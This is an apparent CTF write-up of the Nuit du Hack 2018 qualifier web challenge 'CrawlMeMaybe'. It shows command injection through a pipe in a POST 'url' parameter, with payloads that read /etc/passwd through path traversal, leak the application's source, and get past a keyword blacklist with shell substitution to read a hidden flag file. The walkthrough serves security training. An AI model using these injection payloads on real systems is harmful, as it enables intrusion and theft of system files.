The weekend of 03\/31\/2018 is pre-qualification for the Nuit du Hack 2018<\/a><\/strong>\u00a0as a Jeopardy CTF<\/strong>. Having had the opportunity and the time to participate with some colleagues and friends, here\u2019s a write-up resolution of the challenges which we could participate.<\/p>\n This web challenge can be use to check \/ verify parsing of an external website. The main idea is to inject attack vector as command execution in the POST “url” destinated to the “result” endpoint. Some command filter are in place.<\/p>\n When we go to the main URL, the service is displayed :<\/p>\n CrawlMeMaybe accueil<\/p><\/div>\n With a legitimate URL, the targeted website is analyzed:<\/p>\n Parse d’un domaine tiers<\/p><\/div>\n By playing with the POST “url” parameter to the “result” page, we can see that the “CrawlMeMaybe.rb” source code is partialy leaked with some vectors and a blacklist is in place to filter command injection (like “flag” or “txt” or “*”) :<\/p>\n CrawlMeMaybe blacklist<\/p><\/div>\n First, the command injection is located simply :<\/p>\n The whole “CrawlMemAybe.rb” Ruby file can be leaked :<\/p>\n Browsing the file system, we can find this path “\/home\/challenge\/src” where a hidden “.flag.txt” file is located :<\/p>\n .flag.txt file found<\/p><\/div>\n There is the string “flag” in the “.flag.txt” filename, so we can’t just do a “cat” command on it because there is a blacklist filter. We have to find a shell command to read the content of this file without provide the direct filename.<\/p>\n Several payload can be used, like list all “\/home\/challenge\/src” files and play with “head” and “tail” command :<\/p>\n\n
![\"CrawlMeMaybe](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/CrawlMeMaybe01-293x300.png\")
<\/a>![\"Parse](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/CrawlMeMaybe02-273x300.png\")
<\/a>![\"CrawlMeMaybe](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/CrawlMeMaybe05-300x128.png\")
<\/a>url=|cat ..\/..\/..\/..\/..\/..\/..\/etc\/passwd<\/pre>\n
url=| echo $(cat ..\/..\/..\/..\/..\/home\/challenge\/src\/CrawlMeMaybe.rb)<\/pre>\n
![\".flag.txt](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/CrawlMeMaybe03-300x134.png\")
<\/a>POST \/result HTTP\/1.1\r\nContent-Length: 114\r\nContent-Type: application\/x-www-form-urlencoded\r\nReferer: http:\/\/crawlmemaybe.challs.malice.fr\/\r\nCookie:\r\nHost: crawlmemaybe.challs.malice.fr\r\nConnection: Keep-alive\r\nAccept-Encoding: gzip,deflate\r\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.21 (KHTML, like Gecko) Chrome\/41.0.2228.0 Safari\/537.21\r\nAccept: *\/*\r\n\r\nurl=| cat ..\/..\/..\/..\/..\/home\/challenge\/src\/\"$(ls -1art ..\/..\/..\/..\/..\/home\/challenge\/src\/ | tail -n4 | head -n1)\"<\/pre>\n
![\"CrawlMeMaybe](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/CrawlMeMaybe-300x159.png\")
<\/a>![\"CrawlMeMayb](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/CrawlMeMaybe04-300x103.png\")
<\/a>